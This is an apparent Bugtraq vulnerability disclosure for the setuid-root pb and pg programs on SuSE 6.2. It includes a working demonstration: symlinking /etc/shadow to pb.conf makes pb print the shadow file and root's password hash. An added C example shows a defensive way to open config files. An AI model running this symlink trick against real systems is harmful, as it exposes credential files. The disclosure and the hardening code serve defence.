- Subject: Two SuSE 6.2 local root exploits
- To: BUGTRAQ@SECURITYFOCUS.COM
-
-
- Greetings,
-
-
- /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
- any user to read any file on the system as shown:
-
-
- susebox:/root # ls -la /usr/bin/pb
- uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
-
-
- susebox:/root # strace /usr/bin/pb
- ...
- personality(PER_LINUX) = 0
- getpid() = 16623
- brk(0) = 0x805032c
- brk(0x80504cc) = 0x80504cc
- brk(0x8051000) = 0x8051000
- open("pb.conf", O_RDONLY) = -1 ENOENT (No such file or directory)   <-- trouble?
- write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such file or directory
- ) = 41
- _exit(1) = ?
- susebox:/root #
-
-
- ---
- xnec@susebox:/tmp > id
- uid=1001(xnec) gid=100(users) groups=100(users)
- xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
- xnec@susebox:/tmp > pb
- Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::>
- Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::>
- Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
- Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
- ... etc for the entire shadow file
-
-
- The same scenario applies to /usr/bin/pg's pg.conf in your cwd. These two
- programs also contain numerous buffer overflows and other insecure file
- I/O and should obviously lose their suid bits. They cannot operate
- correctly without their s-bits unless they are run by root, but no one
- besides root will run them anyway. These programs are not worth
- patching.
-
-
- Brock Tellier
- UNIX Systems Administrator
- Webley Systems
- www.webley.com
-
-
-
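The failure described in the post is a privileged process opening a relative, symlink-followable config name. The following is an added example, not code from the original post or from pb/pg, of how a setuid program can open its config defensively. The names `open_trusted_config` and `demo` are hypothetical, the temp-dir fixture is constructed, and Linux `open(2)` semantics are assumed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not from pb/pg): absolute path only, final component
 * must not be a symlink, file must be regular, owned by `owner`, and not
 * group/other-writable. Returns an fd, or -1 with errno set. */
int open_trusted_config(const char *path, uid_t owner)
{
    struct stat st;
    if (path == NULL || path[0] != '/') {   /* never resolve against the cwd */
        errno = EINVAL;
        return -1;
    }
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0)
        return -1;                          /* ELOOP when path is a symlink */
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == owner &&
        !(st.st_mode & (S_IWGRP | S_IWOTH)))
        return fd;
    close(fd);
    errno = EPERM;
    return -1;
}

/* Constructed check in a fresh temp dir. Returns a bitmask: 1 = regular file
 * accepted, 2 = symlink named pb.conf refused with ELOOP, 4 = relative name
 * refused with EINVAL; -1 if the fixture could not be built. */
int demo(void)
{
    char dir[] = "/tmp/cfgdemoXXXXXX", real[64], lnk[64];
    int fd, ok = 0;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(real, sizeof real, "%s/real.conf", dir);
    snprintf(lnk, sizeof lnk, "%s/pb.conf", dir);
    fd = open(real, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || symlink(real, lnk) != 0) return -1;
    close(fd);
    if ((fd = open_trusted_config(real, geteuid())) >= 0) { ok |= 1; close(fd); }
    if (open_trusted_config(lnk, geteuid()) < 0 && errno == ELOOP) ok |= 2;
    if (open_trusted_config("pb.conf", geteuid()) < 0 && errno == EINVAL) ok |= 4;
    unlink(lnk); unlink(real); rmdir(dir);
    return ok;
}
int main(void) { printf("demo() = %d\n", demo()); return 0; }
```

`O_NOFOLLOW` covers only the final path component, so the directories above the config file must themselves be writable by root alone.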